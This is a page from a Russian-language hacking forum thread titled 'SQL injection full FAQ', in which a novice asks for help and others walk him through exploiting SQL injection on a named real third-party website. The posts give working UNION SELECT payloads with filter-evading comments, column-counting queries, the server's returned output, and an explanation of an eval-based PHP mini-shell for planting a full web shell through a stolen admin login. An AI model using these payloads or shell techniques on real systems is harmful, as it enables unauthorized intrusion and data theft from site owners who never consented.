HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > ИНФО > Статьи > Авторские статьи
Перезагрузить страницу SQL injection полный FAQ
   
 
Страница 22 из 26 « Первая < 12 18 19 20 21 22 23 24 25 26 >
 
Опции темы Поиск в этой теме Опции просмотра

  #211  
Старый 28.08.2012, 23:06
Sat-hacker
Guest
Сообщений: n/a
Провел на форуме:
34457

Репутация: -10
По умолчанию
Подскажите пожалуйста пытаюс раскрутить скулу site.ru/index.php?ID=1+order+by+13 ошибки нету order+by+14 ошибка есть значить колонок 13

Затем ввожу

site.ru/index.php?ID=1+union+select+1,2,3,4,5,6,7,8,9,10,1 1,12,13+--+

Ошибка.В чём здесь моя ошибка?Спасибо.
 

  #212  
Старый 28.08.2012, 23:48
Sharp.Net
Guest
Сообщений: n/a
Провел на форуме:
7224

Репутация: 1
По умолчанию
Цитата:
Сообщение от Sat-hacker  
Sat-hacker said:
Подскажите пожалуйста пытаюс раскрутить скулу site.ru/index.php?ID=1+order+by+13 ошибки нету order+by+14 ошибка есть значить колонок 13
Затем ввожу
site.ru/index.php?ID=1+union+select+1,2,3,4,5,6,7,8,9,10,1 1,12,13+--+
Ошибка.В чём здесь моя ошибка?Спасибо.
Таким способом колонки не всегда удаётся узнать, линк в студию
 

  #213  
Старый 29.08.2012, 22:52
Sat-hacker
Guest
Сообщений: n/a
Провел на форуме:
34457

Репутация: -10
По умолчанию
http://www.greenbergresearch.com/index.php?ID=1+group+by+13+--+
 

  #214  
Старый 29.08.2012, 23:49
BigBear
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033

Репутация: 8
По умолчанию
Цитата:
Сообщение от Sat-hacker  
Sat-hacker said:
http://www.greenbergresearch.com/index.php?ID=1+group+by+13+--+
неправильно поля подобрал...

Вывод можно получить так

Код:
Code:
_ttp://www.greenbergresearch.com/index.php?ID=9/*!union*/+select+1,2,3,4,5,6,7,8,9,10,11,12,unhex(Hex(version())),14--
Failed opening '/var/www/html/inc/templates/4.1.12' for inclusion

А вообще тема для таких вопросов тут
 

  #215  
Старый 30.08.2012, 00:33
Sharp.Net
Guest
Сообщений: n/a
Провел на форуме:
7224

Репутация: 1
По умолчанию
Цитата:
Сообщение от Sat-hacker  
Sat-hacker said:
http://www.greenbergresearch.com/index.php?ID=1+group+by+13+--+
http://www.greenbergresearch.com/index.php?ID=-1+order+by+15+--+

False

http://www.greenbergresearch.com/index.php?ID=-1+order+by+14+--+

True - Not found

Значит - Столбцов 14

дальше багбир разъяснил. Суть в том, что нужно было ID не действительный сделать, -1 или 999999999999
 

  #216  
Старый 30.08.2012, 00:48
Sat-hacker
Guest
Сообщений: n/a
Провел на форуме:
34457

Репутация: -10
По умолчанию
Подскажите а вожможно ли залить shell через такую sql уязвимость?И как?Сори за тупой вопрос.Новичёк в этих делах.
 

  #217  
Старый 30.08.2012, 08:35
Sat-hacker
Guest
Сообщений: n/a
Провел на форуме:
34457

Репутация: -10
По умолчанию
Просто не очень понял как при помощи этого кода '' залить shell.

Что за код такой?И как из него может получиться shell?Не не наркоман,просто не могу разобраться вот и спросил.А тему читтал раз 10.Не всё понялю
 

  #218  
Старый 30.08.2012, 08:43
M_script
Новичок
Регистрация: 04.11.2004
Сообщений: 5
Провел на форуме:
4512

Репутация: 0
По умолчанию
Цитата:
Сообщение от Sat-hacker  
Sat-hacker said:
просто не могу разобраться вот и спросил
просто не пытаешься разобраться вот и спрашиваешь
 

  #219  
Старый 30.08.2012, 08:51
Sat-hacker
Guest
Сообщений: n/a
Провел на форуме:
34457

Репутация: -10
По умолчанию
Всё что получалось по инструкции делал сам,но здесь немножко не понял,буду благодарен за помощь.
 

  #220  
Старый 31.08.2012, 00:05
Sharp.Net
Guest
Сообщений: n/a
Провел на форуме:
7224

Репутация: 1
По умолчанию
Цитата:
Сообщение от Sat-hacker  
Sat-hacker said:
Просто не очень понял как при помощи этого кода '' залить shell.
Что за код такой?И как из него может получиться shell?Не не наркоман,просто не могу разобраться вот и спросил.А тему читтал раз 10.Не всё понялю
давай разжуём подробнее

eval - это команда, которая вычисляет/обрабатывает строку как PHP код. Т.е например будет равносильно .

А $_GET это переменная окружения, которая берёт содержимое из GET переменной, в данном случае переменная "e", т.е test.ru/index.php?e=PHP_Код

и если index.php будет содержать '', то скрипт выполнит код из переменной "e". Это своего рода минишелл, с помощью него можно залить полноценный. Через SQL инекцию ты код не выполнишь, за исключением, если БД поддерживает его, что очень редко. В замен в ней ты узнаешь пароль и логин админки и другие интересные данный, но это не всегда удаётся..

И потом уже через админку льёшь шелл

Что касается твоего случая... там вообще 4 ветка БД Мускла, так что таблицы необходимо подбирать, для этого можно воспользоваться спец софтом, тем же говнохавиджом. Тебе он самое то..

З.Ы И судя по твоему нику, ты сам окрещаешь себя как ламера, т.е ты завышаешь свои способности, а сам ничего не умеешь, следовательно можно с большой вероятностью предположить, что ты школьник, без обид. Советую отучится сперва, т.к твой интеллект ещё не развит для уровня логичного понимания запросов
 
 
Страница 22 из 26 « Первая < 12 18 19 20 21 22 23 24 25 26 >



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
SQL Injection: Modes of Attack, Defence, and Why It Matters bxN5 Forum for discussion of ANTICHAT 1 09.04.2007 19:07
SQL Injection FAQ bx_N Forum for discussion of ANTICHAT 2 08.03.2007 18:48



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ